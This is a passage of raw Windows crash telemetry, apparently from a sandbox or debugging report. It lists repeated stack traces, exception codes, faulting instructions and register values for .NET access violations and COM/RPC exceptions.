DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c06a9
registers.esp: 97971840
registers.edi: 36719672
registers.eax: 0
registers.ebp: 97971880
registers.edx: 195
registers.ebx: 36831240
registers.esi: 36837912
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c0567
0x8c4f75
0x8c4e72
0x8c3ab4
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c06a9
registers.esp: 97971836
registers.edi: 36719672
registers.eax: 0
registers.ebp: 97971876
registers.edx: 195
registers.ebx: 36831428
registers.esi: 37307384
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c0567
0x8c4eea
0x8c50c0
0x8c3add
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c06a9
registers.esp: 97971840
registers.edi: 36719672
registers.eax: 0
registers.ebp: 97971880
registers.edx: 195
registers.ebx: 36831356
registers.esi: 37342656
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c0567
0x8c4f75
0x8c50e0
0x8c3add
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c06a9
registers.esp: 97971836
registers.edi: 36719672
registers.eax: 0
registers.ebp: 97971876
registers.edx: 195
registers.ebx: 36856460
registers.esi: 37377576
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c0567
0x8c4eea
0x8c50eb
0x8c3add
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c06a9
registers.esp: 97971840
registers.edi: 36719672
registers.eax: 0
registers.ebp: 97971880
registers.edx: 195
registers.ebx: 36831356
registers.esi: 37412532
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c46ea
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 0
registers.ebp: 95088788
registers.edx: 1093
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c470b
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 95088748
registers.ebp: 95088788
registers.edx: 9193221
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c46ea
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 0
registers.ebp: 95088788
registers.edx: 1093
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c470b
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 95088748
registers.ebp: 95088788
registers.edx: 9193221
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c46ea
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 0
registers.ebp: 95088788
registers.edx: 1093
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c470b
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 95088748
registers.ebp: 95088788
registers.edx: 9193221
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 47834432
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 47840384
registers.r11: 47836192
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1971422145
registers.r13: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 49145392
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 49151344
registers.r11: 49147152
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1974836690
registers.r13: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
